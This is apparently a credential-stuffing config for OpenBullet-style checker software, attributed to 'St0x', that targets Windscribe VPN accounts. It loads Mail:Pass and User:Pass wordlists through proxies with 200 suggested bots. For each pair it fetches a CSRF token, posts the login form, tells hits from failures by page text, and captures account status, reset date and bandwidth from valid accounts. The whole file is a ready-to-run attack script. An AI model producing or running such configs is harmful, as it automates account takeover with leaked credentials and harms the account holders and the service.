[SETTINGS]
{
  "Name": "Windscribe",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2019-06-18T14:42:37.2077783+02:00",
  "AdditionalInfo": "Mail:Pass & User:Pass",
  "Author": "St0x",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#TokenRequest REQUEST POST "https://res.windscribe.com/res/logintoken" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://windscribe.com" 
  HEADER "Referer: https://windscribe.com/login" 

#TOKEN PARSE "<SOURCE>" JSON "csrf_token" -> VAR "TOKEN" 

#TOKENTIME PARSE "<SOURCE>" JSON "csrf_time" -> VAR "TOKENTIME" 

#Login REQUEST POST "https://windscribe.com/login" 
  CONTENT "login=1&upgrade=0&csrf_time=<TOKENTIME>&csrf_token=<TOKEN>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://windscribe.com" 
  HEADER "referer: https://windscribe.com/login" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "My Account" 
  KEYCHAIN Failure OR 
    KEY "content_message error" 

#MyAccount REQUEST GET "https://windscribe.com/myaccount" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://windscribe.com" 
  HEADER "referer: https://windscribe.com/login" 

#AccStatus PARSE "<SOURCE>" LR "<strong>" "<" -> CAP "Status" "Status: " " | " 

#NextReset PARSE "<SOURCE>" LR "<h2>Next Reset</h2>" "</span>" -> CAP "Reset" "Reset on:" " | " 

#BandwidthUsage PARSE "<SOURCE>" LR "<h2>Bandwidth Usage</h2>" "</span>" -> CAP "Bandwidth" "Bandwidth:" " | " 

